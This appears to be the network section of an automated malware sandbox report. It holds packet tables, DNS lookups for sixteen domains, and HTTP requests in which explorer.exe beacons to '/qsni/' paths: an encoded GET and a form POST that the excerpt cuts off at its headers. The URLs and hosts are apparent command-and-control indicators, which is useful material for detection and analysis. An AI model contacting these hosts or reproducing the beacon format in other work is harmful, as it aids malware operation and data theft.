                                                                                          Mar 30, 2023 10:26:01.273123980 CEST8049742194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:01.273154020 CEST8049742194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:01.273174047 CEST8049742194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:01.273199081 CEST8049742194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:01.273245096 CEST4974280192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:01.273245096 CEST4974280192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:01.273327112 CEST4974280192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:02.724922895 CEST4974280192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.740930080 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.802650928 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.804198027 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.804330111 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.865720987 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.865953922 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.865991116 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866014957 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866060972 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866087914 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866086960 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.866111994 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866137028 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866137028 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.866162062 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866162062 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.866187096 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:03.866199017 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.866337061 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.866506100 CEST4974380192.168.2.6194.58.112.174
                                                                                          Mar 30, 2023 10:26:03.927680016 CEST8049743194.58.112.174192.168.2.6
                                                                                          Mar 30, 2023 10:26:08.932552099 CEST4974480192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:08.951917887 CEST804974481.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:08.955533028 CEST4974480192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:08.955986977 CEST4974480192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:08.975311995 CEST804974481.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:08.976933956 CEST804974481.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:08.976969004 CEST804974481.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:08.977061987 CEST4974480192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:10.459741116 CEST4974480192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:11.518723965 CEST4974580192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:11.538161993 CEST804974581.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:11.538990974 CEST4974580192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:11.539109945 CEST4974580192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:11.558471918 CEST804974581.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:11.559953928 CEST804974581.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:11.560019016 CEST804974581.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:11.560120106 CEST4974580192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:13.053764105 CEST4974580192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:14.070086956 CEST4974680192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:14.091423988 CEST804974681.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:14.091674089 CEST4974680192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:14.091861963 CEST4974680192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:14.112972021 CEST804974681.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:14.114164114 CEST804974681.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:14.114202023 CEST804974681.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:14.114655018 CEST4974680192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:14.114821911 CEST4974680192.168.2.681.169.145.66
                                                                                          Mar 30, 2023 10:26:14.136250019 CEST804974681.169.145.66192.168.2.6
                                                                                          Mar 30, 2023 10:26:19.576371908 CEST4974780192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:19.719245911 CEST804974745.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:19.719446898 CEST4974780192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:19.719599962 CEST4974780192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:19.862144947 CEST804974745.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:19.862185955 CEST804974745.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:19.862205029 CEST804974745.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:19.862272978 CEST4974780192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:21.226490021 CEST4974780192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:22.259398937 CEST4974880192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:22.398282051 CEST804974845.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:22.398601055 CEST4974880192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:22.399391890 CEST4974880192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:22.538028002 CEST804974845.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:22.538081884 CEST804974845.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:22.538106918 CEST804974845.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:22.538127899 CEST804974845.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:22.538439035 CEST4974880192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:23.914830923 CEST4974880192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:24.930078983 CEST4974980192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:25.075292110 CEST804974945.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:25.076733112 CEST4974980192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:25.076992035 CEST4974980192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:25.221606970 CEST804974945.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:25.221638918 CEST804974945.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:25.221673012 CEST804974945.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:25.221904993 CEST4974980192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:25.222104073 CEST4974980192.168.2.645.32.200.254
                                                                                          Mar 30, 2023 10:26:25.366713047 CEST804974945.32.200.254192.168.2.6
                                                                                          Mar 30, 2023 10:26:30.597362041 CEST4975080192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:30.800887108 CEST804975069.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:30.801085949 CEST4975080192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:30.801249027 CEST4975080192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:31.018115997 CEST804975069.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:31.018188000 CEST804975069.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:31.018312931 CEST4975080192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:32.305347919 CEST4975080192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:33.324043989 CEST4975180192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:33.525197983 CEST804975169.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:33.525329113 CEST4975180192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:33.525509119 CEST4975180192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:33.726937056 CEST804975169.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:33.740356922 CEST804975169.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:33.740602970 CEST804975169.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:33.740715981 CEST4975180192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:35.140223026 CEST4975180192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:36.687382936 CEST4975280192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:36.888461113 CEST804975269.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:36.888618946 CEST4975280192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:36.892739058 CEST4975280192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:37.124103069 CEST804975269.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:37.124147892 CEST804975269.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:37.124177933 CEST804975269.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:37.124300003 CEST4975280192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:37.124388933 CEST4975280192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:37.125005960 CEST4975280192.168.2.669.172.75.142
                                                                                          Mar 30, 2023 10:26:37.325670004 CEST804975269.172.75.142192.168.2.6
                                                                                          Mar 30, 2023 10:26:44.167562962 CEST4975380192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:26:44.205146074 CEST804975345.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:26:44.206633091 CEST4975380192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:26:44.206953049 CEST4975380192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:26:44.244137049 CEST804975345.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:26:44.247869968 CEST804975345.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:26:44.247929096 CEST804975345.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:26:44.248107910 CEST4975380192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:26:44.248300076 CEST4975380192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:26:44.285851955 CEST804975345.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:26:49.260407925 CEST4975480192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:49.289132118 CEST8049754145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:49.289324045 CEST4975480192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:49.294538975 CEST4975480192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:49.323303938 CEST8049754145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:49.325633049 CEST8049754145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:49.325664997 CEST8049754145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:49.325767994 CEST4975480192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:50.806885004 CEST4975480192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:51.823172092 CEST4975580192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:51.851850986 CEST8049755145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:51.852227926 CEST4975580192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:51.852358103 CEST4975580192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:51.880975962 CEST8049755145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:51.882659912 CEST8049755145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:51.882739067 CEST8049755145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:51.882853985 CEST4975580192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:53.354106903 CEST4975580192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:54.379662037 CEST4975680192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:54.408061028 CEST8049756145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:54.408185005 CEST4975680192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:54.408302069 CEST4975680192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:54.436674118 CEST8049756145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:54.439362049 CEST8049756145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:54.439393997 CEST8049756145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:54.439524889 CEST4975680192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:54.439670086 CEST4975680192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:26:54.467873096 CEST8049756145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:26:59.448699951 CEST4975780192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:26:59.468847990 CEST804975781.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:26:59.469120979 CEST4975780192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:26:59.469527960 CEST4975780192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:26:59.489600897 CEST804975781.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:26:59.494611979 CEST804975781.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:26:59.494657993 CEST804975781.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:26:59.494714022 CEST4975780192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:00.980813026 CEST4975780192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:01.996084929 CEST4975880192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:02.016530991 CEST804975881.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:02.016726017 CEST4975880192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:02.016891003 CEST4975880192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:02.037064075 CEST804975881.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:02.037113905 CEST804975881.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:02.041692972 CEST804975881.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:02.041733980 CEST804975881.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:02.041898012 CEST4975880192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:03.604914904 CEST4975880192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:04.620682001 CEST4975980192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:04.640860081 CEST804975981.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:04.641128063 CEST4975980192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:04.641196012 CEST4975980192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:04.661267042 CEST804975981.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:04.667037010 CEST804975981.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:04.667197943 CEST804975981.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:27:04.669173956 CEST4975980192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:04.669174910 CEST4975980192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:27:04.689416885 CEST804975981.17.29.150192.168.2.6

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Mar 30, 2023 10:23:43.115715981 CEST4978653192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:23:43.188956976 CEST53497868.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:23:48.295696020 CEST5859553192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:23:48.342173100 CEST53585958.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:23:59.445990086 CEST5633153192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:23:59.507750988 CEST53563318.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:24:09.671205044 CEST5050653192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:24:09.735743046 CEST53505068.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:24:20.809679031 CEST4944853192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:24:21.015984058 CEST53494488.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:24:32.562897921 CEST5908253192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:24:32.817954063 CEST53590828.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:24:43.665764093 CEST5950453192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:24:43.726715088 CEST53595048.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:24:56.049604893 CEST6519853192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:24:56.099185944 CEST53651988.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:25:06.362098932 CEST6291053192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:25:06.407944918 CEST53629108.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:25:16.645483017 CEST6386353192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:25:16.722574949 CEST53638638.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:25:32.162067890 CEST6322953192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:25:32.242202044 CEST53632298.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:25:46.785130978 CEST6253853192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:25:46.820986986 CEST53625388.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:25:57.227602959 CEST5490353192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:25:57.319271088 CEST53549038.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:26:08.899730921 CEST5153053192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:26:08.927879095 CEST53515308.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:26:19.381172895 CEST5612253192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:26:19.532351017 CEST53561228.8.8.8192.168.2.6
                                                                                          Mar 30, 2023 10:26:30.246437073 CEST5255653192.168.2.68.8.8.8
                                                                                          Mar 30, 2023 10:26:30.596468925 CEST53525568.8.8.8192.168.2.6

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Mar 30, 2023 10:23:43.115715981 CEST192.168.2.68.8.8.80xc9cfStandard query (0)www.studioweiden.clickA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:23:48.295696020 CEST192.168.2.68.8.8.80xc2c6Standard query (0)www.deconsurveys.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:23:59.445990086 CEST192.168.2.68.8.8.80x9f6dStandard query (0)www.pgatraining.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:09.671205044 CEST192.168.2.68.8.8.80x7f67Standard query (0)www.dammar.netA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:20.809679031 CEST192.168.2.68.8.8.80x175cStandard query (0)www.no-leaks.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:32.562897921 CEST192.168.2.68.8.8.80xfe72Standard query (0)www.lozpw.spaceA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:43.665764093 CEST192.168.2.68.8.8.80x283bStandard query (0)www.paystiky.siteA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:56.049604893 CEST192.168.2.68.8.8.80xeb19Standard query (0)www.coolconnect.onlineA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:06.362098932 CEST192.168.2.68.8.8.80x4d2dStandard query (0)www.solscape.orgA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:16.645483017 CEST192.168.2.68.8.8.80x78a4Standard query (0)www.thedivinerudraksha.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:32.162067890 CEST192.168.2.68.8.8.80x5238Standard query (0)www.wellblech.shopA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:46.785130978 CEST192.168.2.68.8.8.80x9ad1Standard query (0)www.laksiricargo.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:57.227602959 CEST192.168.2.68.8.8.80x9a76Standard query (0)www.smirnovmir.onlineA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:08.899730921 CEST192.168.2.68.8.8.80x2bStandard query (0)www.eylien.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:19.381172895 CEST192.168.2.68.8.8.80x695aStandard query (0)www.goosedigitals.comA (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:30.246437073 CEST192.168.2.68.8.8.80xe4e6Standard query (0)www.hexiemoju.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Mar 30, 2023 10:23:43.188956976 CEST8.8.8.8192.168.2.60xc9cfNo error (0)www.studioweiden.click45.136.196.215A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:23:48.342173100 CEST8.8.8.8192.168.2.60xc2c6No error (0)www.deconsurveys.comdeconsurveys.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 30, 2023 10:23:48.342173100 CEST8.8.8.8192.168.2.60xc2c6No error (0)deconsurveys.com145.239.252.49A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:23:59.507750988 CEST8.8.8.8192.168.2.60x9f6dNo error (0)www.pgatraining.com81.17.29.150A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:09.735743046 CEST8.8.8.8192.168.2.60x7f67No error (0)www.dammar.netdammar.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:09.735743046 CEST8.8.8.8192.168.2.60x7f67No error (0)dammar.net199.231.66.204A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:21.015984058 CEST8.8.8.8192.168.2.60x175cNo error (0)www.no-leaks.com156.226.207.81A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:32.817954063 CEST8.8.8.8192.168.2.60xfe72No error (0)www.lozpw.space173.199.124.126A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:43.726715088 CEST8.8.8.8192.168.2.60x283bNo error (0)www.paystiky.site199.192.30.147A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:24:56.099185944 CEST8.8.8.8192.168.2.60xeb19No error (0)www.coolconnect.online185.134.245.113A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:06.407944918 CEST8.8.8.8192.168.2.60x4d2dNo error (0)www.solscape.org91.195.240.94A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:16.722574949 CEST8.8.8.8192.168.2.60x78a4No error (0)www.thedivinerudraksha.comthedivinerudraksha.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:16.722574949 CEST8.8.8.8192.168.2.60x78a4No error (0)thedivinerudraksha.com85.187.128.34A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:32.242202044 CEST8.8.8.8192.168.2.60x5238No error (0)www.wellblech.shopwellblech.shopCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:32.242202044 CEST8.8.8.8192.168.2.60x5238No error (0)wellblech.shop81.169.145.72A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:46.820986986 CEST8.8.8.8192.168.2.60x9ad1No error (0)www.laksiricargo.com217.160.0.81A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:25:57.319271088 CEST8.8.8.8192.168.2.60x9a76No error (0)www.smirnovmir.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:08.927879095 CEST8.8.8.8192.168.2.60x2bNo error (0)www.eylien.comeylien.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:08.927879095 CEST8.8.8.8192.168.2.60x2bNo error (0)eylien.com81.169.145.66A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:19.532351017 CEST8.8.8.8192.168.2.60x695aNo error (0)www.goosedigitals.comgoosedigitals.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:19.532351017 CEST8.8.8.8192.168.2.60x695aNo error (0)goosedigitals.com45.32.200.254A (IP address)IN (0x0001)false
                                                                                          Mar 30, 2023 10:26:30.596468925 CEST8.8.8.8192.168.2.60xe4e6No error (0)www.hexiemoju.com69.172.75.142A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.studioweiden.click
                                                                                          • www.deconsurveys.com
                                                                                          • www.pgatraining.com
                                                                                          • www.dammar.net
                                                                                          • www.no-leaks.com
                                                                                          • www.lozpw.space
                                                                                          • www.paystiky.site
                                                                                          • www.coolconnect.online
                                                                                          • www.solscape.org
                                                                                          • www.thedivinerudraksha.com
                                                                                          • www.wellblech.shop
                                                                                          • www.laksiricargo.com
                                                                                          • www.smirnovmir.online
                                                                                          • www.eylien.com
                                                                                          • www.goosedigitals.com
                                                                                          • www.hexiemoju.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.64970745.136.196.21580C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:23:43.235479116 CEST100OUTGET /qsni/?ZOm=dXna0d&C6=26sVYQdWyPHrLcN8MdbUKtu6rE5mK0DGN1OetThfHCln6c5Rbo6sl7lf7GeT2I5yOzNBygfgGXS7QAdgzJGeV3dtWL+OEoULXVdsrh2vXHGa HTTP/1.1
                                                                                          Host: www.studioweiden.click
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:23:43.276165009 CEST100INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.22.0
                                                                                          Date: Thu, 30 Mar 2023 08:24:00 GMT
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 73 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qsni/ was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.649708145.239.252.4980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:23:48.375561953 CEST102OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.deconsurveys.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.deconsurveys.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.deconsurveys.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
